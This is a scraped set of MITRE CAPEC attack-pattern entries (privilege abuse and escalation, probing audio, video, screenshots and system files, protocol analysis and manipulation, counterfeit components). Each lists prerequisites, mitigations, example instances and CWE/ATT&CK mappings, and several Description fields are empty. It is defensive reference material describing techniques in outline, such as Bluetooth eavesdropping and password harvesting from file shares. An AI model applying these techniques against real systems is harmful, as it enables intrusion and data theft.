ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	599	Terrestrial Jamming

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Communications, Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The target must associate data or activities with a person's identity and the adversary must be able to modify this identity without detection.

Resources Required

None: No specialized resources are required to execute this type of attack.

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Communications: CWE does not currently cover Communications in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Prerequisites
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description Summary
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Attack_Patterns

CAPEC-122: Privilege Abuse

Attack Pattern ID: 122

Abstraction: Meta

View customized information:

Description

Extended Description

If access control mechanisms are absent or misconfigured, a user may be able to access resources that are intended only for higher level users. An adversary may be able to exploit this to utilize a less trusted account to gain information and perform activities reserved for more trusted accounts.

This attack differs from privilege escalation and other privilege stealing attacks in that the adversary never actually escalates their privileges but instead is able to use a lesser degree of privilege to access resources that should be (but are not) reserved for higher privilege accounts. Likewise, the adversary does not exploit trust or subvert systems - all control functionality is working as configured but the configuration does not adequately protect sensitive resources at an appropriate level.

Likelihood Of Attack

High

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	1	Accessing Functionality Not Properly Constrained by ACLs
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	17	Using Malicious Files
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	180	Exploiting Incorrectly Configured Access Control Security Levels
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	201	Serialized Data External Linking
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	503	WebView Exposure
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	664	Server Side Request Forgery

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Subvert Access Control

Prerequisites

The target must have misconfigured their access control mechanisms such that sensitive information, which should only be accessible to more trusted users, remains accessible to less trusted users.

The adversary must have access to the target, albeit with an account that is less privileged than would be appropriate for the targeted resources.

Skills Required

[Level: Low]

Adversary can leverage privileged features they already have access to without additional effort or skill. Adversary is only required to have access to an account with improper priveleges.

Resources Required

None: No specialized resources are required to execute this type of attack. The ability to access the target is required.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality	Read Data
Authorization	Execute Unauthorized Commands
Authorization	Gain Privileges
Access Control Authorization	Bypass Protection Mechanism

Mitigations

Configure account privileges such privileged/administrator functionality is not exposed to non-privileged/lower accounts.

Example Instances

Improperly configured account privileges allowed unauthorized users on a hospital's network to access the medical records for over 3,000 patients. Thus compromising data integrity and confidentiality in addition to HIPAA violations.

Related Weaknesses

CWE-ID	Weakness Name
269	Improper Privilege Management
732	Incorrect Permission Assignment for Critical Resource
1317	Improper Access Control in Fabric Bridge

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1548	Abuse Elevation Control Mechanism

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Consequences, Example_Instances, Likelihood_Of_Attack, Mitigations, Skills_Required
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Weaknesses
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description, Skills_Required
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-233: Privilege Escalation

Attack Pattern ID: 233

Abstraction: Meta

View customized information:

Description

An adversary exploits a weakness enabling them to elevate their privilege and perform an action that they are not supposed to be authorized to perform.

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	30	Hijacking a Privileged Thread of Execution
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	68	Subvert Code-signing Facilities
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	69	Target Programs with Elevated Privileges
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	104	Cross Zone Scripting
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	234	Hijacking a privileged process
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	17	Using Malicious Files

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Subvert Access Control

Related Weaknesses

CWE-ID	Weakness Name
269	Improper Privilege Management
1264	Hardware Logic with Insecure De-Synchronization between Control and Data Channels
1311	Improper Translation of Security Attributes by Fabric Bridge

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1548	Abuse Elevation Control Mechanism

References

[REF-600] "OWASP Web Security Testing Guide". Testing for Privelege Escalation. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/03-Testing_for_Privilege_Escalation.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Description, Description Summary, Relationships, Type (Category -> Attack_Pattern)
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Weaknesses, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References, Related_Weaknesses
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated @Abstraction
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated @Abstraction

CAPEC-634: Probe Audio and Video Peripherals

Attack Pattern ID: 634

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	545	Pull Data from System Resources
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	651	Eavesdropping

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

Knowledge of the target device's or application’s vulnerabilities that can be capitalized on with malicious code. The adversary must be able to place the malicious code on the target device.

Skills Required

[Level: High]

To deploy a hidden process or malware on the system to automatically collect audio and video data.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Prevent unknown code from executing on a system through the use of an allowlist policy.

Patch installed applications as soon as new updates become available.

Example Instances

An adversary can capture audio and video, and transmit the recordings to a C2 server or a similar capability.

An adversary can capture and record from audio peripherals in a vehicle via a Car Whisperer attack. If an adversary is within close proximity to a vehicle with Bluetooth capabilities, they may attempt to connect to the hands-free system when it is in pairing mode. With successful authentication, if an authentication system is present at all, an adversary may be able to play music/voice recordings, as well begin a recording and capture conversations happening inside the vehicle. Successful authentication relies on the pairing security key being set to a default value, or by brute force (which may be less practical in an outside environment) Depending on the sensitivity of the information being discussed, this scenario can be extremely compromising.

An adversary may also use a technique called Bluebugging, which is similar to Bluesnarfing but requires the adversary to be between 10-15 meters of the target device. Bluebugging creates a backdoor for an attacker to listen/record phone calls, forward calls, send SMS and retrieve the phonebook.

Related Weaknesses

CWE-ID	Weakness Name
267	Privilege Defined With Unsafe Actions

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parents CAPEC-651, CAPEC-545)

Entry ID	Entry Name
1123	Audio Capture
1125	Video Capture

References

[REF-653] Amrita Mitra. "What is Car Whisperer?". The Security Buddy. 2017-03-08. <https://www.thesecuritybuddy.com/bluetooth-security/what-is-car-whisperer/>. URL validated: 2021-06-11.

[REF-654] "What is Bluesnarfing?". Finjan Mobile. 2017-03-13. <https://www.finjanmobile.com/what-is-bluesnarfing/>. URL validated: 2021-06-11.

Content History

Submissions
Submission Date	Submitter	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)
Modifications
Modification Date	Modifier	Organization
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations, Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Example_Instances, References

CAPEC-498: Probe iOS Screenshots

Attack Pattern ID: 498

Abstraction: Detailed

View customized information:

Description

Extended Description

These images are used by iOS to aid in the visual transition between open applications and improve the user's experience with a device. An application can be at risk even if it properly protects sensitive information when at rest. If the application displays sensitive information on the screen, then the potential exists for iOS to unintentionally record that information in an image file. An adversary can retrieve these images either by gaining access to the image files, or by physically obtaining the device and leveraging the multitasking switcher interface. This attack differs from CAPEC-648, which targets intentional screenshots initiated by an end-user that are stored in the device's storage.

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	545	Pull Data from System Resources

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

This type of an attack requires physical access to a device to either excavate the image files (potentially by leveraging a Jailbreak) or view the screenshots through the multitasking switcher (by double tapping the home button on the device).

Mitigations

To mitigate this type of an attack, an application that may display sensitive information should clear the screen contents before a screenshot is taken. This can be accomplished by setting the key window's hidden property to YES. This code to hide the contents should be placed in both the applicationWillResignActive() and applicationDidEnterBackground() methods.

Related Weaknesses

CWE-ID	Weakness Name
359	Exposure of Private Personal Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-426] Jonathan Zdziarksi. "Hacking and Securing iOS Applications". Chapter 11 : Page 285 : Application Screenshots. First Edition. O'Reilly Media, Inc.. 2012.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Architectural_Paradigms, Related_Attack_Patterns, Technical_Context
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Description, Extended_Description, Related_Weaknesses
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Probe Application Screenshots

CAPEC-639: Probe System Files

Attack Pattern ID: 639

Abstraction: Detailed

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	545	Pull Data from System Resources

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

An adversary has access to the file system of a system.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Verify that files have proper access controls set, and reduce the storage of sensitive information to only what is necessary.

Example Instances

Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

Adversaries may search network shares on computers they have compromised to find files of interest.

Related Weaknesses

CWE-ID	Weakness Name
552	Files or Directories Accessible to External Parties

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1039	Data from Network Shared Drive
1552.001	Unsecured Credentials: Credentials in Files
1552.003	Unsecured Credentials: Bash History
1552.004	Unsecured Credentials: Private Keys
1552.006	Unsecured Credentials: Group Policy Preferences

Content History

Submissions
Submission Date	Submitter	Organization
2018-05-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2018-05-04 (Version 2.11)
Modifications
Modification Date	Modifier	Organization
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns, Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-573: Process Footprinting

Attack Pattern ID: 573

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	169	Footprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The adversary must have gained access to the target system via physical or logical means in order to carry out this attack.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Mitigations

Identify programs that may be used to acquire process information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist.

Example Instances

On a Windows system, the command, "tasklist," displays information about processes. The same function on a Mac OS system is done with the command, "ps."

In addition to manual discovery of running processes, an adversary can develop malware that carries out this attack pattern before subsequent malicious action.

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1057	Process Discovery

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Examples-Instances, References, Related_Weaknesses, Typical_Likelihood_of_Exploit, Typical_Severity
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations

CAPEC-192: Protocol Analysis

Attack Pattern ID: 192

Abstraction: Meta

View customized information:

Description

Extended Description

Although certain techniques for protocol analysis benefit from manipulating live 'on-the-wire' interactions between communicating components, static or dynamic analysis techniques applied to executables as well as to device drivers, such as network interface drivers, can also be used to reveal the function and characteristics of a communication protocol implementation. Depending upon the methods used the process may involve observing, interacting, and modifying actual communications occurring between hosts. The goal of protocol analysis is to derive the data transmission syntax, as well as to extract the meaningful content, including packet or content delimiters used by the protocol. This type of analysis is often performed on closed-specification protocols, or proprietary protocols, but is also useful for analyzing publicly available specifications to determine how particular implementations deviate from published specifications.

Likelihood Of Attack

Low

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	97	Cryptanalysis

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Communications
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

Access to a binary executable.

The ability to observe and interact with a communication channel between communicating processes.

Skills Required

[Level: High]

Knowlegde of the Open Systems Interconnection model (OSI model), and famililarity with Wireshark or some other packet analyzer.

Resources Required

Depending on the type of analysis, a variety of tools might be required, such as static code and/or dynamic analysis tools. Alternatively, the effort might require debugging programs such as ollydbg, SoftICE, or disassemblers like IDA Pro. In some instances, packet sniffing or packet analyzing programs such as TCP dump or Wireshark are necessary. Lastly, specific protocol analysis might require tools such as PDB (Protocol Debug), or packet injection tools like pcap or Nemesis.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Integrity	Modify Data

Related Weaknesses

CWE-ID	Weakness Name
326	Inadequate Encryption Strength

Notes

Other

There are several challenges inherent to protocol analysis depending upon the nature of the protocol being analyzed. There may also be other types of factors which complicate the process such as encryption or ad hoc obfuscation of the protocol. In general there are two kinds of networking protocols, each associated with its own challenges and analysis approaches or methodologies. Some protocols are human-readable, which is to say they are text-based protocols. Examples of these types of protocols include HTTP, SMTP, and SOAP. Additionally, application-layer protocols can be embedded or encapsulated within human-readable protocols in the data portion of the packet. Typically, human-readable protocol implementations are susceptible to automatic decoding by the appropriate tools, such as Wireshark/ethereal, tcpdump, or similar protocol sniffers or analyzers.

The presence of well-known protocol specifications in addition to easily identified protocol delimiters, such as Carriage Return or Line Feed characters (CRLF) result in text-based protocols susceptibility to direct scrutiny through manual processes. Protocol analysis against protocol implementations such as HTTP is often performed to identify idiosyncratic implementations of a protocol by a server or client. In the case of application-layer protocols which are embedded within text-based protocols, analysis techniques typically benefit from the well-known nature of the encapsulating protocols and can focus on discovering the semantic characteristics of the proprietary protocol or API, since the syntax and protocol delimiters of the underlying protocols can be readily identified.

When performing protocol analysis of machine-readable (non-text-based) protocols difficulties emerge as the protocol itself was designed to be read by computing process. Such protocols are typically composed entirely in binary with no apparent syntax, grammar, or structural boundaries. Examples of these types of protocols are IP, UDP, and TCP. Binary protocols with published specifications can be automatically decoded by protocol analyzers, but in the case of proprietary, closed-specification, binary protocols there are no immediate indicators of packet syntax such as packet boundaries, delimiters, or structure, or the presence or absence of encryption or obfuscation. In these cases there is no one technology that can extract or reveal the structure of the packet on the wire, so it is necessary to use trial and error approaches while observing application behavior based on systematic mutations introduced at the packet-level. Tools such as Protocol Debug (PDB) or other packet injection suites are often employed. In cases where the binary executable is available, protocol analysis can be augmented with static and dynamic analysis techniques.

References

[REF-57] "Wikipedia". Proprietary protocol. The Wikimedia Foundation, Inc. <http://en.wikipedia.org/wiki/Proprietary_protocol>.

[REF-50] "Wikipedia". Reverse engineering. The Wikimedia Foundation, Inc. <http://en.wikipedia.org/wiki/Reverse_engineering>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Activation_Zone, Attacker_Skills_or_Knowledge_Required, Description Summary, Injection_Vector, Other_Notes, Payload, Payload_Activation_Impact, Related_Attack_Patterns, Related_Weaknesses
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Resources_Required, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attacker_Skills_or_Knowledge_Required, Related_Weaknesses
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Protocol Reverse Engineering

CAPEC-272: Protocol Manipulation

Attack Pattern ID: 272

Abstraction: Meta

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	90	Reflection Attack in Authentication Protocol
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	220	Client-Server Protocol Manipulation
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	276	Inter-component Protocol Manipulation
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	277	Data Interchange Protocol Manipulation
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	278	Web Services Protocol Manipulation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

The protocol or implementations thereof must contain bugs that an adversary can exploit.

Resources Required

In some variants of this attack the adversary must be able to intercept communications using the protocol. This means they need to be able to receive the communications from one participant and prevent the other participant from receiving these communications.

Related Weaknesses

No mapping at this level, since it would encompass a plethora of CWEs. Look at related mappings of this CAPEC's descendants.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)

CAPEC-530: Provide Counterfeit Component

Attack Pattern ID: 530

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	531	Hardware Component Substitution

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Supply Chain, Physical Security
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Sustainment

Prerequisites

Advanced knowledge about the target system and sub-components.

Skills Required

[Level: High]

Able to develop and manufacture malicious system components that resemble legitimate name-brand components.

Mitigations

There are various methods to detect if the component is a counterfeit. See section II of [REF-703] for many techniques.

Example Instances

The attacker, aware that the victim has contracted with an integrator for system maintenance and that the integrator uses commercial-off-the-shelf network hubs, develops their own network hubs with a built-in malicious capability for remote access, the malicious network hubs appear to be a well-known brand of network hub but are not. The attacker then advertises to the sub-system integrator that they are a legit supplier of network hubs, and offers them at a reduced price to entice the integrator to purchase these network hubs. The integrator then installs the attacker's hubs at the victim's location, allowing the attacker to remotely compromise the victim's network.

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-698] Paul Wagner. "Combating Counterfeit Components in the DoD Supply Chain". Defence Systems Information Analysis Center. 2015. <https://dsiac.org/articles/combating-counterfeit-components-in-the-dod-supply-chain/>. URL validated: 2022-02-15.

